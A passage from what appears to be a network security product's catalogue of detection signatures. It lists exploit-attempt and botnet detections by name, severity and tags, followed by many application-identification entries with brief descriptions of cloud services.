Tags: Windows 2003, Windows 2000 Server, Windows 2008, Any Hardware, MS2009-03, CVE2009, Windows 2003 not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-212-2032
Last changed: sgpkg-ips-212-2032
Vulnerability: Microsoft-WINS-Server-WPAD-Registration-Spoofing
Description:
Back to top

Generic_UDP-Wireshark-Bluetooth-SDP-Dissector-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Wireshark detected.
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Unix, Linux, Any Hardware, Wireshark, CVE2021, Windows not specific, Unix not specific, Linux not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1455-5242
Last changed: sgpkg-ips-1455-5242
Vulnerability: Wireshark-Bluetooth-SDP-Dissector-Heap-Buffer-Overflow
Description:
Back to top

Generic_UDP-Wireshark-Capwap-Dissector-Denial-Of-Service

About this situation: An attempt to exploit a Wireshark Capwap Dissector Denial Of Service vulnerability detected.
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Wireshark, CVE2013, Any Operating System not specific, Suspected Denial of Service, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-700-5211
Last changed: sgpkg-ips-702-5211
Vulnerability: Wireshark-Capwap-Dissector-Denial-Of-Service
Description:
Back to top

Generic_UDP-Wireshark-LWRES-Dissector-Stack-Based-Buffer-Overflow

About this situation: Wireshark LWRES Dissector Stack Based Buffer Overflow
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Linux, Mac OS X, Any Hardware, Wireshark, CVE2010, Windows not specific, Linux not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-654-5211
Last changed: sgpkg-ips-654-5211
Vulnerability: Wireshark-LWRES-Dissector-Stack-Based-Buffer-Overflow
Description:
Back to top

Generic_UDP-Xdmcp-Double-Free

About this situation: An attempt to exploit a vulnerability in Sun Microsystems Solaris detected
Context: UDP Packet Unknown
Severity: 7
Tags: Solaris 8, Any Hardware, CVE2004, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-409-4219
Vulnerability: Xdmcp-Double-Free
Description:
Back to top

Generic_UDP-XTACACSD-Buffer-Overflow

About this situation: An attempt to exploit an XTACACSD Buffer Overflow vulnerability detected.
Context: UDP Packet Unknown
Severity: 7
Tags: FreeBSD, Any Hardware, XTACACSD, CVE2008, FreeBSD not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-725-5211
Last changed: sgpkg-ips-725-5211
Vulnerability: XTACACSD-Buffer-Overflow
Description:
Back to top

Generic_UDP-Yokogawa-CENTUM-CS3000-BKFSim_vhfd.exe-Stack-Based-Buffer-Overflow

About this situation: A stack based buffer overflow vulnerability in Yokogawa CENTUM CS3000 BKFSim_vhfd.exe
Context: UDP Packet Unknown
Severity: 7
Tags: Windows XP SP3, Any Hardware, Yokogawa CENTUM, CVE2014, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-659-5211
Last changed: sgpkg-ips-659-5211
Vulnerability: Yokogawa-CENTUM-CS3000-BKFSim_vhfd.exe-Stack-Based-Buffer-Overflow
Description:
Back to top

Generic_UDP-Your-Freedom-UDP-Packet

About this situation: A Your Freedom UDP packet detected
Context: UDP Packet Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, Your Freedom, Any Operating System not specific, Tunneling Protocols
First detected in: sgpkg-ips-593-5211
Last changed: sgpkg-ips-593-5211
Vulnerability: Your-Freedom-Network-Usage
Description:
Back to top

Generic_UDP-ZeroAccess-P2P-Communication

About this situation: ZeroAccess UDP packet detected
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-533-5211
Last changed: sgpkg-ips-599-5211
Vulnerability: ZeroAccess-Botnet
Description:
Back to top

Generic_UDP-ZeroAccess.B-Traffic

About this situation: ZeroAccess traffic detected
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-733-5211
Last changed: sgpkg-ips-733-5211
Vulnerability: ZeroAccess-Botnet
Description:
Back to top

Generic_UDP-ZyXEL-Command-Injection-CVE-2023-28771

About this situation: An attempt to exploit a vulnerability in Zyxel firmware detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, ZyXEL, CVE2023, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1595-5242
Last changed: sgpkg-ips-1597-5242
Vulnerability: ZyXEL-Command-Injection-CVE-2023-28771
Description:
Back to top

Generic_UDP_ABB-Multiple-Products-Robnetscanhost.exe-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in ABB ABB Interlink Module detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, ABB Robot Communications Runtime, CVE2012, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-444-4219
Last changed: sgpkg-ips-608-5211
Vulnerability: ABB-Multiple-Products-Robnetscanhost.exe-Stack-Buffer-Overflow
Description:
Back to top

Generic_Veritas-Backup-Exec-Agent-Authentication-Bypass

About this situation: Authentication bypass exploit against Veritas Backup Exec Agent
Context: TCP Client Stream Unknown
Severity: 2
Tags: Windows, x86, Veritas Software NetBackup, CVE2005, Windows not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-63-1210
Last changed: sgpkg-ips-158-2032
Vulnerability: Veritas-Backup-Exec-Agent-Authentication-Bypass
Description:
Back to top

Generic_Veritas-Backup-Exec-Agent-Browser-BOF

About this situation: Attempt to exploit a buffer overflow in Veritas Backup Exec detected
Context: TCP Client Stream Unknown
Severity: 10
Tags: Windows, x86, Veritas Software NetBackup, CVE2004, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-19-1210
Last changed: sgpkg-ips-158-2032
Vulnerability: Veritas-Backup-Exec-Agent-Browser-BOF
Description:
Back to top

Generic_Veritas-Backup-Exec-Agent-Buffer-Overflow

About this situation: Buffer overflow exploit against Veritas Backup Exec Agent
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Veritas Software NetBackup, CVE2005, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-31-1210
Last changed: sgpkg-ips-419-4219
Vulnerability: Veritas-Backup-Exec-Agent-Buffer-Overflow
Description:
Back to top

Generic_Veritas-Backup-Exec-Server-Anonymous-Registry-Access

About this situation: Detects anonymous bind to specific interface and registry-related function call against VERITAS Backup Exec for Windows
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, x86, Veritas Software BackUp Exec, CVE2005, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-90-1314
Last changed: sgpkg-ips-277-4219
Vulnerability: Veritas-Backup-Exec-Server-Remote-Registry-Access
Description:
Back to top

Generic_Veritas-NetBackup-Java-Authentication-Service-Compromise

About this situation: Format strings vulnerability in Veritas NetBackup Java Authentication Service
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Veritas Software NetBackup, CVE2005, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-44-1210
Last changed: sgpkg-ips-1761-5242
Vulnerability: Veritas-NetBackup-Java-Authentication-Service-Compromise
Description:
Back to top

Generic_Veritas-NetBackup-Vnetd-Buffer-Overflow

About this situation: Exploit against buffer overflow vulnerability in the Veritas NetBackup vnetd process
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, x86, Veritas Software NetBackup, CVE2006, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-63-1210
Last changed: sgpkg-ips-1398-5242
Vulnerability: Veritas-NetBackup-Vnetd-Buffer-Overflow
Description:
Back to top

Generic_Visual-IRC-JOIN-Command-Response-Handling-Buffer-Overflow

About this situation: Buffer overflow exploit against Visual IRC detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Visual IRC, CVE2007, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-114-2032
Last changed: sgpkg-ips-158-2032
Vulnerability: Visual-IRC-JOIN-Command-Response-Handling-Buffer-Overflow
Description:
Back to top

Generic_VMware-Authentication-Server-Denial-Of-Service

About this situation: An attempt to exploit VMware Authenticaion Server Denial of Service
Context: TCP Client Stream Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, EMC VMware Workstation, EMC VMware Player, CVE2009, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-216-2032
Last changed: sgpkg-ips-720-5211
Vulnerability: Generic_VMware-Authentication-Server-Denial-Of-Service
Description:
Back to top

Generic_VNC-Remote-Control-Connection

About this situation: Attempt to connect to a VNC server
Context: TCP Client Stream Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, VNC, Any Operating System not specific, VNC not specific, Remote Control, TCP Client Traffic
First detected in: sgpkg-ips-28-1210
Last changed: sgpkg-ips-446-4219
Vulnerability: VNC-Usage
Description:
Back to top

Generic_Windows-Messenger-Service-NetrSendMessage-Usage

About this situation: Detects Windows Messenger Service NetrSendMessage usage
Context: UDP Packet Unknown
Severity: 2
Tags: Windows, x86, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-65-1210
Last changed: sgpkg-ips-325-4219
Vulnerability: MSRPC-NetrSendMessage-Usage
Description:
Back to top

Generixgroup

About this situation: Application Generixgroup detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Generix Group develops software solutions for the manufacturing, logistics and retail ecosystems, helping its customers to manage, pool, integrate and optimize their information flows.
Back to top

Genesys

About this situation: Application Genesys detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Genesys is provider of customer experience and contact center solutions, sells both cloud-based and on-premises software.
Back to top

Genesyslab

About this situation: Application Genesyslab detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Genesys is the market in omnichannel customer experience
Back to top

Genetec

About this situation: Application Genetec detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Genetec develops open-platform software, hardware and cloud-based services for the physical security and public safety industry. Its flagship product, Security Center, unified IP-based video surveillance, access control and license plate recognition
Back to top

Genetec Updater

About this situation: Endpoint Context Agent based Genetec Updater detection
Context: EI Correlation
Severity: 1
Tags: Software / System Updates, Endpoint
First detected in: sgpkg-ips-1147-5242
Last changed: sgpkg-ips-1147-5242
Description: Genetec Updater endpoint application has been detected. Gentec is a provider of IP-based security solutions.
Back to top

Genialchat

About this situation: GenialChat usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based chat service which allows users to send instant messages to each other online using just a web browser.
Back to top

Genie9

About this situation: Application Genie9 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Genie9 Cloud backup all your contacts, messages, call log, photos, music and videos stored on your Android Smart Phone or Tablet to a secure cloud location.
Back to top

GenieDB

About this situation: Application GenieDB detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GenieDB - provides suite of tools: Provisioning, Monitoring, Management, Data Security and Protection, Multi-Master Replication and Syndication, MySQL Support, Backup/Restore.
Back to top

Genius

About this situation: Application Genius detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Genius is a knowledge base, allows users to provide annotations and interpretation of song lyrics, news stories, primary source documents, poetry.
Back to top

Geniusinside

About this situation: Application Geniusinside detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Genius Project offers a platform-independent SaaS and On-Premise project and portfolio management software
Back to top

GenMyModel

About this situation: Application GenMyModel detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: GenMyModel is an online UML modeling tool for software architects and developers. It enables users to design and share models, and generate code in the browser.
Back to top

Genoo

About this situation: Application Genoo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Genoo provides marketing automation and online marketing tools to small and midsize businesses.
Back to top

Gensuite

About this situation: Application Gensuite detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Gensuite is a cloud-based solutions that enables to manage business compliance processes and management systems.
Back to top

Geocaching

About this situation: Geocaching usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Orienteering, Application Routing
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-769-5211
Description: Geocaching is a treasure hunt hobby where individuals hide and seek for caches using GPS devices.
Back to top

Geologic

About this situation: Application Geologic detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GeoLOGIC providing clients in the oil and gas industry with the superior data and integrated software they need to make better decisions. GeoLOGIC is continually at work creating integrated solutions that make information more relevant and usable.
Back to top

Geoop

About this situation: GeoOp usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: GeoOp is an international cloud based job management software for trades and service businesses. The service allows organisations to schedule, cost, quote and invoice while workers are out in the field.
Back to top

Geotoko

About this situation: Application Geotoko detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Geotoko is platform that helps interactive agencies, businesses and brands to easily create and measure location-based deals and promotions (e.g. sweepstakes, contests, give-aways) across multiple location-based apps like foursquare, facebook places and gowalla.
Back to top

Geotrust-OCSP

About this situation: Geotrust Online Certificate Status service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-1757-5242
Description: Online Certitificate Status Protocol (OCSP) is used to validate status of Extended Validation Certificates (EV certificates) used with HTTPS.
Back to top

GESIO-Online-Business-Solutions

About this situation: Application GESIO-Online-Business-Solutions detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Billing, Warehousing, CRM, Online Store
Back to top

Get-It-Done

About this situation: Application Get-It-Done detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Get It Done is an online crowdfunding platform for small human-needs development projects.
Back to top

Get-Satisfaction

About this situation: Get Satisfaction usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Get Satisfaction is the leading customer engagement platform that helps companies build better relationships with their customers.
Back to top

getAbstract

About this situation: Application getAbstract detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: getAbstract is a leading online media company with a mission to help business professionals make better decisions and turn them and their companies into more successful entities by finding, expertly compressing and providing universal access to critical business knowledge in a format that can be quickly and easily absorbed.
Back to top

Getapp

About this situation: GetApp usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This site lists online software categorized by industry, business need, operating system, deployment method, and geography. The site also offers peer reviews of software, interviews with software company CEOs, a monthly ranking of popular online software for small businesses, and an interactive online software Q and A section where business users can ask questions and receive advice. GetApp.com is vendor-independent and platform-neutral. Source: Wikipedia
Back to top

GetDashboard

About this situation: Application GetDashboard detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: dashboard is a powerful lead collection and management tool.
Back to top

GetDoneDone

About this situation: Application GetDoneDone detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GetDoneDone - is the simple, effective issue tracker.
Back to top

GetFeedback

About this situation: Application GetFeedback detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GetFeedback is an online survey application that allows anyone to create visually engaging, branded, mobile-ready surveys in minutes.
Back to top

Getquantify

About this situation: Application Getquantify detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Creative Agency Software - Synergy of time-tracking, project management, task management, invoicing and reporting
Back to top

GetResponse

About this situation: Application GetResponse detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GetResponse is the email marketing platform.
Back to top

Getronics

About this situation: Application Getronics detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Getronics offers complete ICT management services such as unified communications, workspace management, and IT consulting for organisations.
Back to top

Getty-Images

About this situation: Application Getty-Images detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Getty Images provides stock photos and imagery collections for advertising and graphic design.
Back to top

Gface

About this situation: GFACE usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-579-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based games-as-service platform; Source Wikipedia.
Back to top

GFI-Cloud

About this situation: Application GFI-Cloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GFI Cloud gives IT admins control of their company
Back to top

GFIMax-Remote-Management

About this situation: Application GFIMax-Remote-Management detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: At GFI MAX provide MSPs and IT support companies with the integrated RMM, Mail Security, Backup and Antivirus solutions, the managed services Building Blocks.
Back to top

GFT

About this situation: Application GFT detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The GFT Group provide companies optimise their business processes by providing intelligent IT solutions and highly skilled specialists.
Back to top

GHG-Corporation

About this situation: Application GHG-Corporation detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GHG Corportation creates and distributes a total employee management package. It can maintain records of leave, work times, and other.
Back to top

GIF File

About this situation: GIF file detected
Context: File Stream Redirection
Severity: 2
Tags: File Type Identification, Content Identification, Media File, GIF Image
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-409-4219
Description:
Back to top

Giga-Alert

About this situation: Application Giga-Alert detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Giga Alert was formerly known as Google Alert. Solution for monitoring your professional interests online. Track the entire web for your topics and receive new results by daily email.
Back to top

Gigamon

About this situation: Application Gigamon detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Gigamon provides an intelligent Visibility Fabric architecture to enable the management of increasingly complex networks. Gigamon technology empowers infrastructure architects, managers and operators with pervasive visibility and control of traffic across both physical and virtual environments without affecting the performance or stability of the production network.
Back to top

Gigasize

About this situation: GigaSize usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A file-sharing service that allows users to upload/download files over the web.
Back to top

GigaSpaces

About this situation: Application GigaSpaces detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GigaSpaces focused on the data scaling industry with its XAP products that provide distributed computing solutions for Extreme Transaction Processing and an additional open source PaaS product called Cloudify, a cloud computing technology was made generally available.
Back to top

Gigaup

About this situation: GigaUP usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: Gigaup is a file sharing service offered through the url www.gigaup.fr. Users can upload files up to 1G bytes in size.
Back to top

Gigya

About this situation: Application Gigya detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Gigya is social optimization platform for business, connecting websites to the social network platforms.
Back to top

Ginkgotree

About this situation: Application Ginkgotree detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ginkgotree is a complete content managemen tsolution for creating, delivering, and self-publishing your curriculums.
Back to top

Ginzametrics

About this situation: GinzaMetrics usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: GinzaMetrics provides an SEO and content marketing platform that provides recommendations and competitor analytics to agencies and marketers.
Back to top

Giosg

About this situation: Giosg usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-768-5211
Last changed: sgpkg-ips-801-5242
Description: Giosg is an online statistics and analytics service.
Back to top

Giphy

About this situation: Application Giphy detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Giphy helps search, share, and discover GIFs.
Back to top

Git

About this situation: Endpoint Context Agent based Git detection
Context: EI Correlation
Severity: 1
Tags: Framework, Endpoint
First detected in: sgpkg-ips-1523-5242
Last changed: sgpkg-ips-1523-5242
Description: Git for Windows endpoint application detected. Git is a popular version control tool.
Back to top

Git

About this situation: Git usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-539-5211
Last changed: sgpkg-ips-597-5211
Description: Git is an open source revision control system designed to handle large projects.
Back to top

GitHub

About this situation: GitHub usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-577-5211
Last changed: sgpkg-ips-1372-5242
Description: GitHub is a shared software development platform.
Back to top

Gitlab

About this situation: GitLab usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-1151-5242
Last changed: sgpkg-ips-1151-5242
Description: GitLab is a shared software development platform.
Back to top

GKG-Net

About this situation: Application GKG-Net detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Register domain names, host websites, and more with IPv6 support and DNS hosting
Back to top

Glance

About this situation: Glance usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: This tool allows businesses to integrate shared browsing, screen sharing, agent video, mobile showcasing. Source: Wikipedia
Back to top

Glasscubes

About this situation: Application Glasscubes detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Glasscubes is a Online Collaboration Platform to share files, manage tasks and communicate.
Back to top

Glassdoor

About this situation: Application Glassdoor detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Glassdoor is site where employees and former employees anonymously review companies and their management
Back to top

Glesys

About this situation: Application Glesys detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GleSYS is a provider of dedicated and cloud server solutions to businesses worldwide.
Back to top

Glide

About this situation: glide usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-629-5211
Description: Glide provides a free suite of rights-based productivity and collaboration applications with 30GBs of storage. Setup and administer up to six family member accounts including child accounts from your Glide settings panel. The Glide OS provides automatic file and application compatibility across devices and operating systems. With Glide OS the user also get the Glide Sync App which helps to synchronize user's home and work files.
Back to top

Gliffy

About this situation: Gliffy usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Gliffy allows users to create and share flowcharts, network diagrams, floor plans, user interface designs and other drawings online.
Back to top

Global-Cloud-Xchange

About this situation: Application Global-Cloud-Xchange detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Global Cloud Xchange is an international provider of integrated communications solutions for businesses.
Back to top

GlobalCollect

About this situation: Application GlobalCollect detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GlobalCollect is a payment service that provides processing eCommerce payments. The company processes international eCommerce payments for eCommerce brands in the digital goods and services, travel, retail and video gaming industries.
Back to top

Globaledit

About this situation: Application Globaledit detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Globaledit's online collaboration tools help creative teams improve processes. Workflow management software makes photo and video approval, markup and sharing easy.
Back to top

GlobalLogic

About this situation: Application GlobalLogic detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GlobalLogic is a product development services that combines domain expertise and cross-industry experience to connect makers with markets.
Back to top

GlobalMeet

About this situation: GlobalMeet usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-717-5211
Last changed: sgpkg-ips-717-5211
Description: GlobalMeet is an online collaboration and conferencing application. It provides a platform for web conferencing which allows for sharing of screen, files and chatting. The service can be accessed using a web browser at https://www.globalmeet.com/.
Back to top

GlobalRelay

About this situation: Application GlobalRelay detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Global Relay provide compliance messaging, archiving and message management services.
Back to top

Globalscape

About this situation: Application Globalscape detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Globalscape ensures the reliability of mission-critical operations by securing sensitive data and intellectual property. Globalscape's suite of solutions features Enhanced File Transfer, the industry-leading enterprise file transfer solution that delivers military-grade security and a customizable platform for achieving control and visibility of data in motion or at rest, across multiple locations.
Back to top

Globe-Business

About this situation: Application Globe-Business detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
